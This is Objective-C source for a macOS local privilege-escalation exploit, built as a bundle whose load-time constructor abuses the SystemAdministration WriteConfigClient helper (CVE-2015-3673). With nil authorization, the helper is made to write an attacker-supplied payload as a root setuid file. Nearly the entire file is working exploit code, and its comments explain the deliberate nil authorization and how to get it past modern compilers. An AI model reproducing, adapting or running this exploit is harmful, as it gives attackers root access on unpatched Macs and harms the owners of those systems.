// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa

#include <dlfcn.h>
#include <objc/objc.h>
#include <objc/runtime.h>
#include <objc/message.h>
#include <Foundation/Foundation.h>

#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
#define FWK_BASE "/System/Library/Frameworks"

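/// Bundle constructor: runs as soon as this .daplug is loaded into its host
/// process (see the build line at the top of the file), so no symbol lookup or
/// explicit call is needed from the loader.
///
/// It reaches into the private SystemAdministration framework, obtains the
/// WriteConfigClient's remote proxy and asks it to create a file at
/// $PAYLOAD_OUT with the bytes of $PAYLOAD_IN and mode 04777 (setuid + world
/// rwx). The privileged helper honouring that request without a valid
/// authorization is the weakness this file is named after (CVE-2015-3673);
/// the nil passed to -authenticateUsingAuthorizationSync: is deliberate and
/// is the whole point of the exploit, not an oversight.
///
/// Always terminates the process with exit(1) afterwards — presumably so the
/// host application never continues running with this bundle inside it.
void __attribute__ ((constructor)) test(void)
{
    // Typed trampolines for objc_msgSend. Calling the bare variadic prototype
    // with object arguments happens to work on x86_64 but is rejected by
    // current clang (OBJC_OLD_DISPATCH_PROTOTYPES=0); casting to the exact
    // signature is the supported way to dispatch through the runtime.
    id (*sendNoArgs)(id, SEL) = (id (*)(id, SEL))objc_msgSend;
    id (*sendOneArg)(id, SEL, id) = (id (*)(id, SEL, id))objc_msgSend;
    id (*sendThreeArgs)(id, SEL, id, id, id) = (id (*)(id, SEL, id, id, id))objc_msgSend;

    // RTLD_NOW so a missing/renamed symbol fails here rather than mid-dispatch.
    void *framework = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);

    if (framework != NULL)
    {
        NSDictionary *env = [[NSProcessInfo processInfo] environment];
        NSString *inpath = env[@"PAYLOAD_IN"];
        NSString *outpath = env[@"PAYLOAD_OUT"];

        // -dataWithContentsOfFile: returns nil for nil/unreadable paths; do not
        // send an empty or nil payload to the helper — it would create a
        // setuid file with garbage (or fail noisily) instead of doing nothing.
        NSData *payload = (inpath != nil) ? [NSData dataWithContentsOfFile:inpath] : nil;

        Class clientClass = objc_lookUpClass("WriteConfigClient");

        if (clientClass != Nil && payload != nil && outpath != nil)
        {
            id sharedClient = sendNoArgs((id)clientClass, @selector(sharedClient));

            // nil authorization: the vulnerable helper still hands out a
            // usable proxy (this is the bug being exploited, keep it nil).
            sendOneArg(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);

            id tool = sendNoArgs(sharedClient, @selector(remoteProxy));

            // 04777 = setuid bit plus rwx for owner/group/other; the helper
            // runs privileged, so the resulting file is a root setuid binary.
            sendThreeArgs(tool,
                          @selector(createFileWithContents:path:attributes:),
                          payload,
                          outpath,
                          @{ NSFilePosixPermissions : @04777 });
        }
    }

    // Never let the host process carry on after the constructor has run.
    exit(1);
}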